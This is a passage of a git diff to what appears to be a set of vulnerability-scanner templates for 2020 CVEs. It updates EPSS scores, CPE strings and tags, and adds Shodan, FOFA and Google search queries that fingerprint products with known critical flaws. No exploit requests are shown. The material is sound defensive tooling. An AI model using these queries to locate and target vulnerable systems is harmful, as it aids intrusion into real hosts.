cpe:2.3:o:cisco:unified_ip_conference_station_7937g_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index a4bf4dc52a..227f3054ff 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-16846 cwe-id: CWE-78 epss-score: 0.97467 - epss-percentile: 0.99957 + epss-percentile: 0.99962 cpe: cpe:2.3:a:saltstack:salt:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 0bbe1a0700..3334e2b247 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.6 cve-id: CVE-2020-16952 cwe-id: CWE-346 - epss-score: 0.90125 - epss-percentile: 0.9872 + epss-score: 0.90937 + epss-percentile: 0.98837 cpe: cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 7176d4dbdc..6712bc6cd1 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-17362 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.412 + epss-percentile: 0.41606 cpe: cpe:2.3:a:themeinprogress:nova_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 6c324ce14b..4e045e955d 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-17453 cwe-id: CWE-79 epss-score: 0.00845 - epss-percentile: 0.81776 + epss-percentile: 0.82114 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve2020,cve,xss,wso2 http: diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index b7e29cd0a0..73e1fc696f 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -20,13 +20,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17456 cwe-id: CWE-78 - epss-score: 0.96263 - epss-percentile: 0.99495 - cpe: cpe:2.3:o:seowonintech:slc-130_firmware:-:*:*:*:*:*:*:* + epss-score: 0.96253 + epss-percentile: 0.99525 + cpe: cpe:2.3:h:seowonintech:slc-130:-:*:*:*:*:*:*:* metadata: max-request: 2 vendor: seowonintech - product: slc-130_firmware + product: slc-130 tags: cve,cve2020,seowon,oast,packetstorm,rce,router,unauth,iot,seowonintech variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index 780e36249a..d6ae07a7b1 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -29,6 +29,8 @@ info: vendor: thedaylightstudio product: fuel_cms shodan-query: http.title:"fuel cms" + fofa-query: title="fuel cms" + google-query: intitle:"fuel cms" tags: cve,cve2020,packetstorm,sqli,fuel-cms,kev,thedaylightstudio http: diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index 146e4e4c97..a8dd10f9ed 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-17496 cwe-id: CWE-74 - epss-score: 0.97451 - epss-percentile: 0.99949 + epss-score: 0.97461 + epss-percentile: 0.99957 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vbulletin product: vbulletin + google-query: intext:"powered by vbulletin" + shodan-query: http.title:"powered by vbulletin" + fofa-query: body="powered by vbulletin" tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists http: diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index a4f23ab207..3267e63e23 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-17505 cwe-id: CWE-78 - epss-score: 0.96502 - epss-percentile: 0.99502 + epss-score: 0.95924 + epss-percentile: 0.99459 cpe: cpe:2.3:a:articatech:web_proxy:4.30.000000:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 609325fb4a..4de1a02563 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -18,14 +18,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-17519 cwe-id: CWE-552 - epss-score: 0.97103 - epss-percentile: 0.99737 + epss-score: 0.97141 + epss-percentile: 0.99802 cpe: cpe:2.3:a:apache:flink:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: flink - tags: cve,cve2020,apache,lfi,flink + tags: cve,cve2020,apache,lfi,flink,kev http: - method: GET diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index c5d48a8103..0c43506c12 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.7 cve-id: CVE-2020-17526 cwe-id: CWE-287 - epss-score: 0.08372 - epss-percentile: 0.93787 + epss-score: 0.06442 + epss-percentile: 0.9369 cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: apache product: airflow fofa-query: Apache Airflow + shodan-query: http.title:"airflow - dags" || http.html:"apache airflow" + google-query: intitle:"sign in - airflow" tags: cve,cve2020,apache,airflow,auth-bypass http: diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index 4c50584e0b..f18447b738 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2020,apache,rce,struts,kev,packetstorm http: diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index ba4395254f..39a235d958 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-18268 cwe-id: CWE-601 epss-score: 0.00147 - epss-percentile: 0.49792 + epss-percentile: 0.50674 cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-19282.yaml b/http/cves/2020/CVE-2020-19282.yaml index edb66c2da2..b2e1bb7912 100644 --- a/http/cves/2020/CVE-2020-19282.yaml +++ b/http/cves/2020/CVE-2020-19282.yaml @@ -26,6 +26,7 @@ info: max-request: 1 vendor: jeesns product: jeesns + fofa-query: title="jeesns" tags: cve2020,cve,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-19283.yaml b/http/cves/2020/CVE-2020-19283.yaml index 7349dcd02a..50c9435141 100644 --- a/http/cves/2020/CVE-2020-19283.yaml +++ b/http/cves/2020/CVE-2020-19283.yaml @@ -20,12 +20,13 @@ info: cve-id: CVE-2020-19283 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47808 + epss-percentile: 0.48691 cpe: cpe:2.3:a:jeesns:jeesns:1.4.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeesns product: jeesns + fofa-query: title="jeesns" tags: cve,cve2020,jeesns,xss http: diff --git a/http/cves/2020/CVE-2020-19360.yaml b/http/cves/2020/CVE-2020-19360.yaml index 38fe9b6f3c..dc1cabe26e 100644 --- a/http/cves/2020/CVE-2020-19360.yaml +++ b/http/cves/2020/CVE-2020-19360.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-19360 cwe-id: CWE-22 epss-score: 0.05104 - epss-percentile: 0.92761 + epss-percentile: 0.92929 cpe: cpe:2.3:a:fhem:fhem:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-1943.yaml b/http/cves/2020/CVE-2020-1943.yaml index 27ce751cc2..a79f2bfa25 100644 --- a/http/cves/2020/CVE-2020-1943.yaml +++ b/http/cves/2020/CVE-2020-1943.yaml @@ -20,13 +20,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-1943 cwe-id: CWE-79 - epss-score: 0.50879 - epss-percentile: 0.97475 + epss-score: 0.47046 + epss-percentile: 0.97448 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: ofbiz + fofa-query: body="ofbiz" + shodan-query: http.html:"ofbiz" tags: cve2020,cve,apache,xss,ofbiz http: diff --git a/http/cves/2020/CVE-2020-19515.yaml b/http/cves/2020/CVE-2020-19515.yaml index cf7850d5de..98bffa6d05 100644 --- a/http/cves/2020/CVE-2020-19515.yaml +++ b/http/cves/2020/CVE-2020-19515.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-19515 cwe-id: CWE-79 - epss-score: 0.00102 - epss-percentile: 0.41242 + epss-score: 0.00106 + epss-percentile: 0.43259 cpe: cpe:2.3:a:qdpm:qdpm:9.1:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,7 @@ info: vendor: qdpm product: qdpm shodan-query: http.favicon.hash:762074255 + fofa-query: icon_hash=762074255 tags: cve2020,cve,xss,qdpm,unauth http: diff --git a/http/cves/2020/CVE-2020-1956.yaml b/http/cves/2020/CVE-2020-1956.yaml index 55b1c1bc92..c8079f3177 100644 --- a/http/cves/2020/CVE-2020-1956.yaml +++ b/http/cves/2020/CVE-2020-1956.yaml @@ -30,6 +30,7 @@ info: vendor: apache product: kylin shodan-query: http.favicon.hash:-186961397 + fofa-query: icon_hash=-186961397 tags: cve,cve2020,apache,kylin,rce,oast,kev variables: username: "{{username}}:" diff --git a/http/cves/2020/CVE-2020-20285.yaml b/http/cves/2020/CVE-2020-20285.yaml index e7993a1d98..2796e6885d 100644 --- a/http/cves/2020/CVE-2020-20285.yaml +++ b/http/cves/2020/CVE-2020-20285.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20285 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 - epss-score: 0.0009 - epss-percentile: 0.37789 + epss-score: 0.00182 + epss-percentile: 0.55354 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-20300.yaml b/http/cves/2020/CVE-2020-20300.yaml index a2a35f76f7..bd330c1754 100644 --- a/http/cves/2020/CVE-2020-20300.yaml +++ b/http/cves/2020/CVE-2020-20300.yaml @@ -29,6 +29,7 @@ info: vendor: weiphp product: weiphp shodan-query: http.html:"WeiPHP5.0" + fofa-query: body="weiphp" tags: cve,cve2020,weiphp,sql,sqli http: diff --git a/http/cves/2020/CVE-2020-2036.yaml b/http/cves/2020/CVE-2020-2036.yaml index be479fca2a..e6d5ba3cae 100644 --- a/http/cves/2020/CVE-2020-2036.yaml +++ b/http/cves/2020/CVE-2020-2036.yaml @@ -22,12 +22,14 @@ info: cve-id: CVE-2020-2036 cwe-id: CWE-79 epss-score: 0.03232 - epss-percentile: 0.91005 + epss-percentile: 0.91222 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: paloaltonetworks product: pan-os + fofa-query: icon_hash="-631559155" + shodan-query: http.favicon.hash:"-631559155" tags: cve2020,cve,vpn,xss,paloaltonetworks http: diff --git a/http/cves/2020/CVE-2020-2096.yaml b/http/cves/2020/CVE-2020-2096.yaml index 8fe9b69322..0d6cd0c2db 100644 --- a/http/cves/2020/CVE-2020-2096.yaml +++ b/http/cves/2020/CVE-2020-2096.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2096 cwe-id: CWE-79 epss-score: 0.96965 - epss-percentile: 0.99712 + epss-percentile: 0.99727 cpe: cpe:2.3:a:jenkins:gitlab_hook:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 @@ -29,6 +29,8 @@ info: product: gitlab_hook framework: jenkins shodan-query: http.title:"GitLab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" tags: cve2020,cve,jenkins,xss,gitlab,plugin,packetstorm http: diff --git a/http/cves/2020/CVE-2020-20982.yaml b/http/cves/2020/CVE-2020-20982.yaml index 6ee8c91260..6727f23c8e 100644 --- a/http/cves/2020/CVE-2020-20982.yaml +++ b/http/cves/2020/CVE-2020-20982.yaml @@ -12,13 +12,14 @@ info: reference: - https://github.com/shadoweb/wdja/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2020-20982 cwe-id: CWE-79 - epss-score: 0.01894 - epss-percentile: 0.8721 + epss-score: 0.02028 + epss-percentile: 0.8889 cpe: cpe:2.3:a:wdja:wdja_cms:1.5.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-21012.yaml b/http/cves/2020/CVE-2020-21012.yaml index f980c8c7c8..d1a2ffdb2e 100644 --- a/http/cves/2020/CVE-2020-21012.yaml +++ b/http/cves/2020/CVE-2020-21012.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-21012 cwe-id: CWE-89 - epss-score: 0.07235 - epss-percentile: 0.93887 + epss-score: 0.07351 + epss-percentile: 0.94065 cpe: cpe:2.3:a:hotel_and_lodge_booking_management_system_project:hotel_and_lodge_booking_management_system:2.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-2103.yaml b/http/cves/2020/CVE-2020-2103.yaml index 5adba642ed..b7acdfb1a4 100644 --- a/http/cves/2020/CVE-2020-2103.yaml +++ b/http/cves/2020/CVE-2020-2103.yaml @@ -20,14 +20,15 @@ info: cvss-score: 5.4 cve-id: CVE-2020-2103 cwe-id: CWE-200 - epss-score: 0.00534 - epss-percentile: 0.76681 + epss-score: 0.00527 + epss-percentile: 0.76943 cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 2 vendor: jenkins product: jenkins shodan-query: http.favicon.hash:81586312 + fofa-query: icon_hash=81586312 tags: cve,cve2020,jenkins http: diff --git a/http/cves/2020/CVE-2020-2140.yaml b/http/cves/2020/CVE-2020-2140.yaml index 2067c059b4..7255e5e5be 100644 --- a/http/cves/2020/CVE-2020-2140.yaml +++ b/http/cves/2020/CVE-2020-2140.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-2140 cwe-id: CWE-79 epss-score: 0.00181 - epss-percentile: 0.54462 + epss-percentile: 0.55271 cpe: cpe:2.3:a:jenkins:audit_trail:*:*:*:*:*:jenkins:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-22208.yaml b/http/cves/2020/CVE-2020-22208.yaml index ff8cb13e1b..6025551523 100644 --- a/http/cves/2020/CVE-2020-22208.yaml +++ b/http/cves/2020/CVE-2020-22208.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/blindkey/cve_like/issues/10 - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-22208 cwe-id: CWE-89 - epss-score: 0.19578 - epss-percentile: 0.9585 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22209.yaml b/http/cves/2020/CVE-2020-22209.yaml index 0b164d90aa..137f120d57 100644 --- a/http/cves/2020/CVE-2020-22209.yaml +++ b/http/cves/2020/CVE-2020-22209.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22209 cwe-id: CWE-89 - epss-score: 0.15522 - epss-percentile: 0.95775 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22210.yaml b/http/cves/2020/CVE-2020-22210.yaml index 5002d18314..71d65d54bc 100644 --- a/http/cves/2020/CVE-2020-22210.yaml +++ b/http/cves/2020/CVE-2020-22210.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22210 cwe-id: CWE-89 - epss-score: 0.20254 - epss-percentile: 0.95933 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-22211.yaml b/http/cves/2020/CVE-2020-22211.yaml index 6ce1741b67..ac7a1d257c 100644 --- a/http/cves/2020/CVE-2020-22211.yaml +++ b/http/cves/2020/CVE-2020-22211.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-22211 cwe-id: CWE-89 - epss-score: 0.20254 - epss-percentile: 0.95933 + epss-score: 0.18558 + epss-percentile: 0.96216 cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-23015.yaml b/http/cves/2020/CVE-2020-23015.yaml index ef03b8ae04..db201321a1 100644 --- a/http/cves/2020/CVE-2020-23015.yaml +++ b/http/cves/2020/CVE-2020-23015.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2020-23015 cwe-id: CWE-601 epss-score: 0.00179 - epss-percentile: 0.54178 + epss-percentile: 0.55016 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: opnsense product: opnsense + shodan-query: http.title:"opnsense" + fofa-query: title="opnsense" + google-query: intitle:"opnsense" tags: cve2020,cve,redirect,opnsense http: diff --git a/http/cves/2020/CVE-2020-23517.yaml b/http/cves/2020/CVE-2020-23517.yaml index 8311519908..90a5e336be 100644 --- a/http/cves/2020/CVE-2020-23517.yaml +++ b/http/cves/2020/CVE-2020-23517.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 - epss-score: 0.00132 - epss-percentile: 0.47292 + epss-score: 0.00135 + epss-percentile: 0.48718 cpe: cpe:2.3:a:aryanic:high_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: high_cms shodan-query: title:"HighMail" fofa-query: title="HighMail" + google-query: intitle:"highmail" tags: cve,cve2020,xss,cms,highmail,aryanic http: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index e236d1f6dd..b7b83f77e9 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -19,13 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - epss-score: 0.01489 - epss-percentile: 0.85494 + epss-score: 0.01689 + epss-percentile: 0.87694 cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kyocera product: d-copia253mf_plus_firmware + shodan-query: http.favicon.hash:-50306417 + fofa-query: icon_hash=-50306417 tags: cve2020,cve,printer,iot,lfi,edb,kyocera http: diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index ecb351c611..21cd1ee210 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2020-23697 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37812 + epss-percentile: 0.38392 cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: verified: true max-request: 4 vendor: monstra product: monstra_cms + shodan-query: http.favicon.hash:419828698 + fofa-query: icon_hash=419828698 tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra variables: string: "{{to_lower('{{randstr}}')}}" diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 42abc155aa..5c30f563dd 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 - epss-score: 0.15451 - epss-percentile: 0.95765 + epss-score: 0.1917 + epss-percentile: 0.96258 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 2 @@ -27,6 +27,7 @@ info: product: import_xml_and_rss_feeds framework: wordpress fofa-query: body="import-xml-feed" + shodan-query: http.html:"import-xml-feed" tags: cve,cve2020,wordpress,wp-plugin,ssrf,mooveagency flow: http(1) && http(2) diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 0b96ab896d..a11fbbd5a2 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - epss-score: 0.97448 - epss-percentile: 0.99947 + epss-score: 0.97489 + epss-percentile: 0.99973 cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 479d3e3e4b..cf1285a2b9 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - epss-score: 0.02041 - epss-percentile: 0.87791 + epss-score: 0.01622 + epss-percentile: 0.87473 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 37cae3cbaa..a6fc48b68f 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -27,6 +27,9 @@ info: vendor: mongo-express_project product: mongo-express framework: node.js + shodan-query: http.title:"mongo express" + fofa-query: title="mongo express" + google-query: intitle:"mongo express" tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js http: diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 88a4b2c5d0..7e7da2b9eb 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -20,8 +20,8 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.04563 - epss-percentile: 0.9232 + epss-score: 0.05447 + epss-percentile: 0.93154 cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 54828aaffe..59d9e17037 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -19,13 +19,16 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24589 cwe-id: CWE-611 - epss-score: 0.65955 - epss-percentile: 0.97835 + epss-score: 0.64778 + epss-percentile: 0.97891 cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve2020,cve,wso2,xxe,oast,blind http: diff --git a/http/cves/2020/CVE-2020-24701.yaml b/http/cves/2020/CVE-2020-24701.yaml index f2bc0fc8b8..8ac6e19024 100644 --- a/http/cves/2020/CVE-2020-24701.yaml +++ b/http/cves/2020/CVE-2020-24701.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24701 cwe-id: CWE-79 - epss-score: 0.00818 - epss-percentile: 0.81463 + epss-score: 0.00816 + epss-percentile: 0.8179 cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" + fofa-query: body="appsuite" tags: cve,cve2020,packetstorm,seclists,appsuite,xss,open-xchange http: diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index d74e13a076..fe24e7e56c 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24902 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.56453 + epss-percentile: 0.5699 cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: product: quixplorer shodan-query: http.title:"My Download Server" google-query: intitle:"My Download Server" + fofa-query: title="my download server" tags: cve,cve2020,quixplorer,xss,quixplorer_project http: diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index 0768866d5e..ce62d05cfc 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2020-24903 cwe-id: CWE-79 epss-score: 0.00269 - epss-percentile: 0.67095 + epss-percentile: 0.67701 cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: verified: true diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 56b58ad4e6..308f2afbe1 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2020-24912 cwe-id: CWE-79 epss-score: 0.00346 - epss-percentile: 0.7108 + epss-percentile: 0.71607 cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index bd8314a444..9a0e51e49b 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -22,8 +22,8 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - epss-score: 0.97381 - epss-percentile: 0.99899 + epss-score: 0.97395 + epss-percentile: 0.99916 cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index cd19370ce5..03e13e70b3 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -20,13 +20,16 @@ info: cvss-score: 9.8 cve-id: CVE-2020-25223 cwe-id: CWE-78 - epss-score: 0.97508 - epss-percentile: 0.99981 + epss-score: 0.97521 + epss-percentile: 0.99989 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: sophos product: unified_threat_management + shodan-query: http.title:"securepoint utm" + fofa-query: title="securepoint utm" + google-query: intitle:"securepoint utm" tags: cve,cve2020,sophos,rce,oast,unauth,kev http: diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index 5baf81dbeb..3fc5fbcc3a 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -27,6 +27,8 @@ info: max-request: 2 vendor: dlink product: dns-320_firmware + shodan-query: http.html:"sharecenter" + fofa-query: body="sharecenter" tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2020/CVE-2020-2551.yaml 